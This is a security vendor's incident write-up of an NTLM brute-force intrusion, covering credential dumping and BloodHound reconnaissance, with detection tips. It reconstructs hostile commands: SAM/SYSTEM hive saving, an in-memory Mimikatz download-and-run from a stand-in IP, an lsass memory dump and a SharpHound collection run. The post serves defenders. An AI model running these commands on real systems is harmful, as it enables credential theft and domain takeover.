Deep Dive: Exploring an NTLM Brute Force Attack with Bloodhound

In this post, we describe how our Vigilance MDR team investigated a classic NTLM brute force attack, a type of attack that has become very common against our customers in recent weeks. Following the attacker’s steps, we cover the following topics:

  • The attack vector: NTLM brute forcing
  • Multiple credential dumping techniques
  • SharpHound – an Active Directory collection tool
  • The detection

Our threat researchers have encountered a large number of lateral movement detections that SentinelOne identified as NTLM brute force attacks. As can be seen in the image below, there were a total of 2,481 detections across hundreds of machines. Based on the credential dumping and PowerShell post-exploitation activity, we mapped these indicators to MITRE ATT&CK IDs T1003 (Credential Dumping), T1064 (Scripting) and T1086 (PowerShell).

We begin with taking initial mitigation steps:

  • Disconnecting the machine from the network
  • Issuing, with one click, the Remediate command, which kills and quarantines the malicious process group and removes any files and persistence mechanisms that were created
  • Blacklisting and blocking any IOCs we find

Then we conduct a deeper analysis of the attack. The victim machine is a Data Center server that was targeted from an internal machine not protected by the SentinelOne agent; therefore, we couldn’t identify how the attacker first got into the customer’s network.

So What Is NTLM?

NTLM stands for “New Technology LAN Manager” and is a proprietary Microsoft authentication protocol. It uses a challenge/response mechanism to authenticate a user without ever sending the user’s password over the network.

Although the word “new” is no longer accurate in 2020 (the protocol is decades old, and stronger authentication protocols have long been available), NTLM is still here and in use. Let’s take a look at how it works.

  1. The user logs in with their credentials
  2. The user’s password is hashed (the NT hash)
  3. The hash is stored in the machine’s local account database: the Security Account Manager (SAM)
  4. The user sends a connection request to the server
  5. The server generates a random Challenge and sends it to the user
  6. The user’s machine encrypts the random Challenge with the password hash
  7. The server encrypts the same Challenge with its stored copy of the password hash
  8. The server validates that the Challenge response was created by the user by comparing the two results
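
To make the exchange concrete, here is a minimal PowerShell sketch of steps 5–8 for NTLMv2. All values are placeholders: the real NT hash is the unsalted MD4 of the UTF-16LE password (which .NET does not expose directly), and the client “blob” is simplified to zeroes.

```powershell
# Minimal sketch of steps 5-8 for NTLMv2. All values are placeholders.
$user   = 'alice'            # hypothetical account name
$domain = 'CORP'             # hypothetical domain name
$ntHash = [byte[]]::new(16)  # placeholder for the real 16-byte NT hash

# Step 5: the server generates a random 8-byte challenge
$challenge = [byte[]](1..8 | ForEach-Object { Get-Random -Maximum 256 })

# Step 6: the client derives the NTLMv2 key from the NT hash ...
$hmac  = [System.Security.Cryptography.HMACMD5]::new($ntHash)
$v2Key = $hmac.ComputeHash([Text.Encoding]::Unicode.GetBytes($user.ToUpper() + $domain))

# ... and computes the response over the challenge plus a client "blob"
# (timestamp and client nonce; simplified to zeroes here)
$blob     = [byte[]]::new(28)
$hmac2    = [System.Security.Cryptography.HMACMD5]::new($v2Key)
$response = $hmac2.ComputeHash([byte[]]($challenge + $blob))

# Steps 7-8: the server repeats the same computation with its stored copy
# of the hash and compares the two responses.
[BitConverter]::ToString($response)
```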

When Do Organizations Use It?

NTLM is usually used by organizations when:

  • There is no Kerberos trust between two different forests
  • Either the client or the server is not joined to the same domain
  • The client authenticates to the server by IP address (Kerberos requires a hostname-based service principal name)
  • The organizational firewall is blocking Kerberos ports

Why Is NTLM Still In Use?

There are two NTLM versions, but both are weak and have known vulnerabilities.

Since NTLMv1 hashes are not salted and always have the same length, modern processing power can crack such hashes in just a few seconds.

NTLMv2 was intended as a cryptographically strengthened replacement for NTLMv1, since it uses a salted hash and variable-length responses. However, before the client sends the salted response to the server, the unsalted hash sits in the client’s memory, which exposes the password to offline cracking whenever the client responds to a challenge.

While better authentication protocols such as Kerberos provide several advantages over NTLM, organizations, as we can see, are still using the NTLM protocol.

The main reasons are:

  • Since NTLM is a legacy protocol, organizations fear that disabling it will break legacy applications and devices such as printers and file servers, causing damage to production.
  • Organizations have to identify and map every machine that still needs this protocol, and then figure out how to migrate from NTLM to a more secure authentication protocol such as Kerberos.

What Are the Signs of an NTLM Brute Force Attack?

One or more of the following activities should appear on your network when an NTLM Brute Force attack is taking place:

  • Multiple account lockouts after the attacker makes too many attempts
  • A single source machine conducting password spraying against multiple machines
  • Use of the NTLM protocol combined with account enumeration
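
On Windows endpoints, one minimal way to hunt for these signs is to group failed logons in the Security event log by source machine, as in the sketch below (assuming logon auditing is enabled; Event ID 4625 records failed logons, 4740 records account lockouts).

```powershell
# A minimal hunting sketch (assumes logon auditing is enabled): group
# failed logons (Event ID 4625) by source workstation. One source machine
# failing against many accounts suggests password spraying.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents 5000 |
    ForEach-Object {
        $xml = [xml]$_.ToXml()
        [pscustomobject]@{
            Account = ($xml.Event.EventData.Data | Where-Object Name -eq 'TargetUserName').'#text'
            Source  = ($xml.Event.EventData.Data | Where-Object Name -eq 'WorkstationName').'#text'
        }
    } |
    Group-Object Source |
    Sort-Object Count -Descending |
    Select-Object -First 10 Count, Name,
        @{ n = 'Accounts'; e = { ($_.Group.Account | Sort-Object -Unique).Count } }
```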

Back to our analysis: examining our internal log files, we can clearly see account enumeration and password spraying from a single, unprotected source machine.

Once the attacker had successfully brute-forced the Data Center server, he continued with credential dumping: querying the Windows Syskey via the RegOpenKeyEx/RegQueryInfoKey API calls and saving the SAM database. The SAM database contains the local accounts’ password hashes, encrypted with the boot key, locally on the machine where they were created, so saving a copy of it is valuable to the attacker.
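
The incident screenshots aren’t reproduced here, but the SAM-saving part of this technique typically boils down to commands like the following (a hypothetical reconstruction, not the attacker’s exact command lines):

```powershell
# Hypothetical reconstruction of the technique (not the attacker's exact
# commands). The SYSTEM hive holds the boot key (Syskey) that is needed
# to decrypt the password hashes stored in the SAM hive.
reg.exe save HKLM\SAM    C:\Windows\Temp\sam.save
reg.exe save HKLM\SYSTEM C:\Windows\Temp\system.save
```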

This activity can be seen in our Active EDR DeepVisibility, which mapped these detections to the corresponding MITRE ATT&CK technique:

The attacker’s next step was to spawn cmd.exe and execute powershell.exe with the following obfuscated code:

Looking at the second line of this obfuscated code, we can see the attacker used -join [char[]] to convert the ASCII values back into strings.

Let’s write a few lines to decode this obfuscated code:
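
The original screenshot isn’t shown here, so the sketch below uses hypothetical ASCII values to illustrate the pattern and its trivial reversal:

```powershell
# Hypothetical example of the obfuscation pattern: the payload is stored
# as ASCII values and rebuilt at runtime with -join [char[]].
$encoded = 105,101,120,32,36,112      # sample values, not the real payload
$decoded = -join [char[]]$encoded     # -> "iex $p" for these sample values
$decoded
```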

Analyzing the decoded source code, we can see the attacker hosted a Mimikatz PowerShell script remotely on the unprotected source machine, then invoked it in memory to dump credentials without ever writing the Mimikatz binary to the victim’s machine.
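
The decoded script itself isn’t reproduced here, but the fileless pattern described above generally looks like the following (hypothetical URL; Invoke-Mimikatz is the PowerSploit port of Mimikatz):

```powershell
# Hypothetical reconstruction of the fileless pattern: download the
# Invoke-Mimikatz script into memory and run it, so the Mimikatz binary
# never touches the victim's disk.
IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
```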

[Embedded video: Empire & Mimikatz Detection Demo – Ryan Merrick, Sr. Strategic Engineer, SentinelOne]

A few minutes later, we identified another detection which revealed the attacker’s next move: dropping and executing two more executables, SharpHound.exe and Procdump64.exe.

Let’s cover each node’s command line.

First, the attacker executed whoami to get login information, and procdump64.exe to dump the memory of lsass.exe.
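
The command lines aren’t reproduced here; a typical invocation of this pair looks like the following hypothetical reconstruction (ProcDump’s -ma flag writes a full memory dump):

```powershell
# Hypothetical reconstruction of the described commands. The resulting
# dump can be parsed offline for credentials (e.g., with Mimikatz's
# sekurlsa::minidump), so Mimikatz never has to run on this host.
whoami /all
.\procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
```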

Executing procdump64.exe is a good example of how attackers use Living Off the Land tactics, since such processes are signed, known and verified (in our case by Microsoft).

That way, attackers hope to hide their malicious activity in an ocean of legitimate processes, and to make it harder for security researchers to determine which group is behind the attack.

Second, the attacker executed the other executable in this malicious group, SharpHound.exe, with the following commands:
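
The screenshot isn’t reproduced here; a typical SharpHound invocation of this kind looks like the following (a hypothetical reconstruction):

```powershell
# Hypothetical reconstruction of the SharpHound run. "-C All" sets the
# CollectionMethod to All, gathering sessions, group memberships, ACLs,
# trusts and more in a single pass.
.\SharpHound.exe -C All
```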

Interlude: A Quick Refresher on SharpHound

Before we continue analyzing the attack, let’s take a quick look at SharpHound to better understand the attacker’s tactics. SharpHound is BloodHound’s data collector: it takes a snapshot of the current Active Directory state, which BloodHound then visualizes as a graph of entities.

This tool helps both defenders and attackers to easily identify correlations between users, machines, and groups. Additionally, this tool:

  • Collects active sessions
  • Collects Active Directory permissions
  • Maps the shortest path to Domain Admins
  • Looks for hidden correlations 

Importantly, even a user with regular permissions can use this tool.

Gathering Data and Lateral Movement

Back to our analysis: the attacker dropped the SharpHound tool, then started collecting data by executing it with the command -C All (i.e., CollectionMethod All).

This command runs an ingester on the victim’s machine that queries Active Directory. Once it finished, the following compressed file was created:

The compressed file contains JSON files with the collected Active Directory information:

The attacker then uploads the compressed dataset to a BloodHound instance backed by a Neo4j server, which imports these JSON files and, after processing them, displays the relationship graph.

Now, we don’t know what kind of snapshot the attacker obtained from the victim’s Data Center server; however, we found this tool very interesting, so here is a quick introduction covering the features we tested in our malware lab.

Once the Neo4j server is up and the JSON files have been successfully imported, we get a small GUI that lets us search for any node in our graph, along with three tabs: Database Info, Node Info, and Queries.

The Database Info tab shows a numerical overview of our Active Directory, answering questions such as:

  • How many users are there? 
  • How many active sessions are there for these users? 
  • How many groups are there? 
  • How many relationships are there between our nodes?

The graph shows all the relationships of a given machine node, as shown below.

For example:

  • Yellow nodes: represent groups [right-click to expand and see members]
  • Green nodes: represent users
  • Red nodes: represent machines and their active sessions
  • MemberOf edge: connects users to the groups they are members of
  • AdminTo edge: indicates a group that has admin privileges on the connected machine node

Note: BloodHound only provides a snapshot of the current state of the domain, meaning that if you are analyzing a graph and find access to a particular entity, it doesn’t mean that session is still active.

The Queries tab contains predefined queries such as:

  • Find all Domain Admins: Finds all the Domain Admins relations from your current node
  • Map Domain Trust: Shows if your current domain has a relationship with other domains 
  • Shortest Paths to High-Value Targets: Shows you the shortest paths to the Domain Admins, Administrators, etc. (Right-click a node to set this machine as a High-Value Target)

The Node Info tab shows us information regarding our current node: 

  • The last time the password was changed (an old timestamp could indicate a weak password)
  • There are 3 active sessions from our current machine
  • There are 30 relationships with High-Value Target machines 
  • First Degree Group Memberships indicates that this node is a member of 3 different groups
  • We have direct RDP connections to 3 machines

We can also try finding a path from our current machine to any target machine we want:

All these BloodHound features show how the attacker leveraged the tool to move laterally in the network over RDP from the compromised Data Center node, trying to reach high-value targets such as Domain Admins and Administrators; the ultimate high-value target was most likely the Domain Controller server.

How Can We Detect BloodHound Traffic?

To identify usage of BloodHound in your environment, monitor network traffic between your endpoints and your Domain Controller, which will mostly be over TCP port 389 (LDAP).

Another indicator is an unusually high volume of queries to the Active Directory server.
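
As a starting point on the endpoint side, a quick check with built-in cmdlets could look like this (a sketch; tune the ports and thresholds for your environment):

```powershell
# A minimal endpoint-side sketch: list processes holding established LDAP
# (389) or LDAPS (636) connections. An unexpected process with many such
# connections (e.g., SharpHound.exe) is worth a closer look.
Get-NetTCPConnection -RemotePort 389,636 -State Established |
    Select-Object LocalAddress, RemoteAddress, RemotePort,
        @{ n = 'Process'; e = { (Get-Process -Id $_.OwningProcess).ProcessName } }
```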

Conclusions

As we have seen, an NTLM brute force attack is still a serious concern for any environment, especially when it combines multiple credential dumping techniques with a tool that snapshots the current Active Directory state.

As always, ensure your SOC team monitors such NTLM activity, as well as suspicious network traffic to the Active Directory server, as we have shown in this post.

Additionally, it’s essential to deploy a modern and capable endpoint security solution. Threat hunters and SOC teams using SentinelOne can detect such activity with Watch lists in our Active EDR DeepVisibility. For example, to detect Windows Syskey events, we can simply create a Watch list that matches a behavioral indicator related to “accessing the Windows Syskeys”. Once such events appear on your network, the Watch list will automatically send you an email with the detection URL.

The SentinelOne agent also prevents aggressive payloads such as Mimikatz from touching the lsass process, and teams can mitigate and remediate any malicious group with just one click in the Management console.

Last but not least, our Vigilance MDR team provides a 24/7 Managed Detection and Response service to SentinelOne’s VIP customers. This detection is just one example out of thousands of threats we handle every day. If you are not yet a SentinelOne customer, contact us to find out more about how we can protect your business or try a free demo.


